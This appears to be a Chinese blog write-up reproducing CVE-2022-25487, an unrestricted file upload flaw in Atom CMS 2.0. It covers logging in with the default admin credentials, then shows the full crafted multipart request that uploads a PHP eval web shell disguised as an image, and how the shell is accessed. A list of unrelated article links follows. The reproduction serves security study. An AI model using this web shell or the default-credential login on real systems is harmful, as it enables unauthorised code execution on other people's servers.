当前位置: 首页 > news >正文

CVE-2022-25487 漏洞复现

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

http://www.lryc.cn/news/300613.html

相关文章:

  • C#面:强类型和弱类型
  • nodejs和npm和vite
  • 相机图像质量研究(24)常见问题总结:CMOS期间对成像的影响--摩尔纹
  • Redis -- 数据库管理
  • 蓝桥杯(Web大学组)2023省赛真题:视频弹幕
  • 真假难辨 - Sora(OpenAI)/世界模拟器的技术报告
  • Linux第52步_移植ST公司的linux内核第4步_关闭内核模块验证和log信息时间戳_编译_并通过tftp下载测试
  • ctfshow-web21~28-WP
  • 鸿蒙开发系列教程(二十四)--List 列表操作(3)
  • 线性代数笔记2--矩阵消元
  • 透光力之珠——光耦固态继电器的独特特点解析
  • C#系列-​​​​​​​EntityFrameworkCore.Transactions.Abstractions应用场景+实例(38)
  • PMDG 737
  • 深入探索Midjourney:领航人工智能的新征程
  • ChatGPT高效提问—prompt实践(漏洞风险分析-重构建议-识别内存泄漏)
  • 【AIGC】Stable Diffusion 的提示词入门
  • 力扣---通配符匹配
  • Rust 原生类型
  • 09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr (生成DAO组件 和 实现自定义查询方法)
  • C# CAD SelectionFilter下TypedValue数组
  • python 爬虫篇(3)---->Beautiful Soup 网页解析库的使用(包含实例代码)
  • 第十二周学习报告
  • Redis面试题整理(持续更新)
  • 一周学会Django5 Python Web开发-Django5 Hello World编写
  • 讲解用Python处理Excel表格
  • WEB APIs(1)
  • C++重新入门-基本输入输出
  • 【C语言】解析刘谦春晚魔术《守岁共此时》
  • 剑指offer——数值的整数次方
  • Tied Block Convolution: 具有共享较薄滤波器的更简洁、更出色的CNN